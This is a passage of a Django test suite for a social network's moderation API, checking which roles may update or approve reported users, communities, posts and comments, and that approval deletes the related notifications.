community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username)
post_comment_creator = make_user()
post_comment_creator.join_community_with_name(community_name=community.name)
post = post_comment_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
post_comment = post_comment_creator.comment_post(post=post,
text=make_fake_post_comment_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post=post, post_comment=post_comment, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
community_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post_comment.pk,
).exists())
def test_community_moderator_cant_update_community_post_comment_moderated_object_if_rejected(self):
"""
community moderator should not be able to update a community post_comment moderated object if status is rejected
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username)
post_comment_creator = make_user()
post_comment_creator.join_community_with_name(community_name=community.name)
post = post_comment_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
post_comment = post_comment_creator.comment_post(post=post,
text=make_fake_post_comment_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post=post, post_comment=post_comment, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
community_moderator.reject_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post_comment.pk,
).exists())
def _get_url(self, moderated_object):
return reverse('moderated-object', kwargs={
'moderated_object_id': moderated_object.pk
})
class ApproveModeratedObjectApiTests(OpenbookAPITestCase):
"""
ModeratedObjectAPI
"""
def test_can_approve_user_moderated_object_if_global_moderator(self):
"""
should be able to approve a user moderated object if global moderator
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_APPROVED
).exists())
def test_approving_user_moderated_object_for_severity_critical_deletes_user_new_post_notifications(self):
"""
should remove all user new post notifications on approval of a user moderated object for severity critical
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
# subscribe to notifications
reporter_user.enable_new_post_notifications_for_user_with_username(username=user.username)
post = user.create_public_post(text=make_fake_post_text())
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
UserNewPostNotification = get_user_new_post_notification_model()
self.assertFalse(UserNewPostNotification.objects.filter(post=post).exists())
def test_approving_user_moderated_object_for_severity_critical_deletes_user_follow_notifications(self):
"""
should remove all user follow notifications on approval of a user moderated object for severity critical
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
followed_user = make_user()
user.follow_user(user=followed_user)
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
FollowNotification = get_follow_notification_model()
self.assertFalse(FollowNotification.objects.filter(follower=user).exists())
def test_approving_user_moderated_object_for_severity_critical_deletes_user_connection_request_notifications(self):
"""
should remove all user connection request notifications on approval of a user moderated object for severity critical
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
requested_user = make_user()
user.connect_with_user_with_id(requested_user.pk)
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
ConnectionRequestNotification = get_connection_request_notification_model()
self.assertFalse(ConnectionRequestNotification.objects.filter(connection_requester=user).exists())
def test_approving_user_moderated_object_for_severity_critical_deletes_user_connection_confirmed_notifications(self):
"""
should remove all user connection confirmed notifications on approval of a user moderated object for severity critical
"""
global_moderator = make_global_moderator()
user = make_user()
circle = make_circle(creator=user)
reporter_user = make_user()
connection_requester = make_user()
connection_requester.connect_with_user_with_id(user.pk)
user.confirm_connection_with_user_with_id(user_id=connection_requester.pk, circles_ids=[circle.pk])
ConnectionConfirmedNotification = get_connection_confirmed_notification_model()
self.assertTrue(ConnectionConfirmedNotification.objects.filter(connection_confirmator=user).exists())
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(ConnectionConfirmedNotification.objects.filter(connection_confirmator=user).exists())
def test_cant_approve_user_moderated_object_if_community_moderator(self):
"""
should not be able to approve a user moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_cant_approve_user_moderated_object_if_regular_user(self):
"""
should not be able to approve a user moderated object if regular user
"""
regular_user = make_user()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_can_approve_community_moderated_object_if_global_moderator(self):
"""
should be able to approve a community moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
status=ModeratedObject.STATUS_APPROVED
).exists())
def test_approving_community_moderated_object_deletes_community_new_post_notifications(self):
"""
should remove community new post notifications on approving a community moderated object
"""
global_moderator = make_global_moderator()
community_admin = make_user()
community = make_community(creator=community_admin)
reporter_community = make_user()
reporter_community.join_community_with_name(community_name=community.name)
reporter_community.enable_new_post_notifications_for_community_with_name(community_name=community.name)
post = community_admin.create_community_post(text=make_fake_post_text(), community_name=community.name)
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
CommunityNewPostNotification = get_community_new_post_notification_model()
self.assertFalse(CommunityNewPostNotification.objects.filter(post=post).exists())
def test_approving_community_moderated_object_deletes_community_invite_notifications(self):
"""
should remove community invite notifications on approving a community moderated object
"""
global_moderator = make_global_moderator()
community_admin = make_user()
community_invitee = make_user()
community = make_community(creator=community_admin)
community_invitee.follow_user(user=community_admin)
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
community_invite = community_admin.invite_user_with_username_to_community_with_name(
username=community_invitee.username,
community_name=community.name)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
CommunityInviteNotification = get_community_invite_notification_model()
self.assertFalse(CommunityInviteNotification.objects.filter(community_invite=community_invite).exists())
def test_cant_approve_community_moderated_object_if_community_moderator(self):
"""
should not be able to approve a community moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_cant_approve_community_moderated_object_if_regular_user(self):
"""
should not be able to approve a community moderated object if regular user
"""
regular_user = make_user()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_can_approve_community_post_moderated_object_if_global_moderator(self):
"""
should be able to approve a community_post moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
status=ModeratedObject.STATUS_APPROVED
).exists())
def test_approving_community_post_moderated_object_deletes_post_reaction_notifications(self):
"""
should delete post reaction notifications on approving a community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
community_post_reactor = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post_reactor.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
emoji_group = make_reactions_emoji_group()
emoji_id = make_emoji(group=emoji_group).pk
community_post_reaction = community_post_reactor.react_to_post(
post=community_post, emoji_id=emoji_id)
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostReactionNotification = get_post_reaction_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostReactionNotification.objects.filter(post_reaction=community_post_reaction).exists())
def test_approving_community_post_moderated_object_deletes_comment_notifications(self):
"""
should delete comment notifications on approving community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
community_post_commenter = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post_commenter.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_commenter.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentNotification = get_post_comment_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentNotification.objects.filter(
post_comment=community_post_comment).exists())
def test_approving_community_post_moderated_object_deletes_comment_reply_notifications(self):
"""
should delete comment reply notifications on approving community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_replier = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_replier.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# create reply
community_post_comment_reply = community_post_replier.reply_to_comment_for_post(
post_comment=community_post_comment,
post=community_post,
text=make_fake_post_comment_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReplyNotification = get_post_comment_reply_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReplyNotification.objects.filter(
post_comment=community_post_comment_reply).exists())
def test_approving_community_post_moderated_object_deletes_comment_reaction_notifications(self):
"""
should delete comment reaction notifications on approving community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_reactor = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_comment_reactor.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# react to comment
emoji_group = make_reactions_emoji_group()
emoji = make_emoji(group=emoji_group)
community_post_comment_reaction = community_post_comment_reactor.react_to_post_comment(
post_comment=community_post_comment,
emoji_id=emoji.pk)
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReactionNotification = get_post_comment_reaction_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReactionNotification.objects.filter(
post_comment_reaction=community_post_comment_reaction).exists())
def test_approving_community_post_moderated_object_deletes_comment_reply_reaction_notifications(self):
"""
should delete comment reply reaction notifications on approving community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_replier = make_user()
community_post_comment_reply_reactor = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_comment_replier.join_community_with_name(community_name=community.name)
community_post_comment_reply_reactor.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# create reply
community_post_comment_reply = community_post_comment_replier.reply_to_comment_for_post(
post_comment=community_post_comment,
post=community_post,
text=make_fake_post_comment_text())
# react to reply
emoji_group = make_reactions_emoji_group()
emoji = make_emoji(group=emoji_group)
community_post_comment_reply_reaction = community_post_comment_reply_reactor.react_to_post_comment(
post_comment=community_post_comment_reply,
emoji_id=emoji.pk)
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReactionNotification = get_post_comment_reaction_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReactionNotification.objects.filter(
post_comment_reaction=community_post_comment_reply_reaction).exists())
def test_approving_community_post_moderated_object_deletes_post_comment_user_mention_notifications(self):
"""
should delete comment user mention notifications on approving community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
mentioned_user = make_user(username='joelito')
post_comment_text = 'Hello @joelito'
community_post_comment_creator.join_community_with_name(community_name=community.name)
mentioned_user.join_community_with_name(community_name=community.name)
# create community post and comment with mention
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=post_comment_text)
# get user mention
PostCommentUserMention = get_post_comment_user_mention_model()
community_post_comment_user_mention = PostCommentUserMention.objects.get(post_comment=community_post_comment)
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentUserMentionNotification = get_post_comment_user_mention_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentUserMentionNotification.objects.filter(
post_comment_user_mention=community_post_comment_user_mention).exists())
def test_approving_community_post_moderated_object_deletes_post_user_mention_notifications(self):
"""
should delete post user mention notifications on approving community_post moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
mentioned_user = make_user(username='joelito')
post_text = 'Hello @joelito'
community_post_creator.join_community_with_name(community_name=community.name)
mentioned_user.join_community_with_name(community_name=community.name)
# create community post with mention
community_post = community_post_creator.create_community_post(
community_name=community.name,
text=post_text)
# get user mention
PostUserMention = get_post_user_mention_model()
community_post_user_mention = PostUserMention.objects.get(post=community_post)
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostUserMentionNotification = get_post_user_mention_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostUserMentionNotification.objects.filter(
post_user_mention=community_post_user_mention).exists())
def test_can_approve_community_post_moderated_object_if_community_post_moderator(self):
"""
should be able to approve a community_post moderated object if community_post moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
status=ModeratedObject.STATUS_APPROVED
).exists())
def test_cant_approve_community_post_moderated_object_if_regular_user(self):
"""
should not be able to approve a community_post moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
status=ModeratedObject.STATUS_PENDING
).exists())
def test_can_approve_community_post_comment_moderated_object_if_global_moderator(self):
"""
should be able to approve a community_post_comment moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
status=ModeratedObject.STATUS_APPROVED
).exists())
def test_approving_community_post_comment_moderated_object_deletes_comment_notifications(self):
"""
should delete comment notifications on approving community_post_comment moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_another_commenter = make_user()
community_post_replier = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_another_commenter.join_community_with_name(community_name=community.name)
community_post_replier.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# second comment by another user, so it actually generates a notification
community_post_second_comment = community_post_another_commenter.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentNotification = get_post_comment_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentNotification.objects.filter(
post_comment=community_post_comment).exists())
self.assertFalse(PostCommentNotification.objects.filter(
post_comment=community_post_second_comment).exists())
def test_approving_community_post_comment_moderated_object_deletes_comment_reply_notifications(self):
"""
should delete comment reply notifications on approving community_post_comment moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_replier = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_replier.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# create reply
community_post_comment_reply = community_post_replier.reply_to_comment_for_post(
post_comment=community_post_comment,
post=community_post,
text=make_fake_post_comment_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReplyNotification = get_post_comment_reply_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReplyNotification.objects.filter(
post_comment=community_post_comment_reply).exists())
def test_approving_community_post_comment_moderated_object_that_is_reply_deletes_comment_reply_notifications(self):
"""
should delete comment reply notifications on approving community_post_comment (that is a reply) moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_replier = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_replier.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# create reply
community_post_comment_reply = community_post_replier.reply_to_comment_for_post(
post_comment=community_post_comment,
post=community_post,
text=make_fake_post_comment_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
# report the reply
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment_reply,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment_reply,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReplyNotification = get_post_comment_reply_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReplyNotification.objects.filter(
post_comment=community_post_comment_reply).exists())
def test_approving_community_post_comment_moderated_object_deletes_comment_reaction_notifications(self):
"""
should delete comment reaction notifications on approving community_post_comment moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_reactor = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_comment_reactor.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# react to comment
emoji_group = make_reactions_emoji_group()
emoji = make_emoji(group=emoji_group)
community_post_comment_reaction = community_post_comment_reactor.react_to_post_comment(
post_comment=community_post_comment,
emoji_id=emoji.pk)
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
PostCommentReactionNotification = get_post_comment_reaction_notification_model()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(PostCommentReactionNotification.objects.filter(
post_comment_reaction=community_post_comment_reaction).exists())
def test_approving_community_post_comment_moderated_object_deletes_comment_reply_reaction_notifications(self):
"""
should delete comments reply reactions notifications on approving community_post_comment moderated object
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_replier = make_user()
community_post_comment_reply_reactor = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post_comment_replier.join_community_with_name(community_name=community.name)
community_post_comment_reply_reactor.join_community_with_name(community_name=community.name)
# create community post and comment
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
# create reply
community_post_comment_reply = community_post_comment_replier.reply_to_comment_for_post(
post_comment=community_post_comment,
post=community_post,
